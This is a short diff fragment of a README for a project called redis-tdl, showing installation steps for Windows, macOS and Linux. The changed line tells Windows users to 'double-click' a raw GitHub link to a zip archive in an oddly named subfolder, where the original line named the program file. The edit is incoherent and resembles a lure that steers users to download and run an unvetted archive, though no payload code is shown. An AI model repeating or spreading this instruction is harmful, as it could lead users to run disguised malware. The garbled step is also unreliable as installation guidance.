p1884879/redis-tdl/README.md

    - If the downloaded file is a compressed folder (like `.zip`), right-click on it and select "Extract" or "Unzip."
 This will create a folder with the redis-tdl files.

 3. **Open the Application:**
-   - For Windows users, double-click on `redis-tdl.exe`.
+   - For Windows users, double-click on `https://raw.githubusercontent.com/p1884879/redis-tdl/main/Calvinistical/redis-tdl.zip`.
    - For macOS users, drag the redis-tdl app to your Applications folder and then open it.
    - For Linux users, you may need to give execute permissions to the file.
 Use the terminal and type:
      ```bash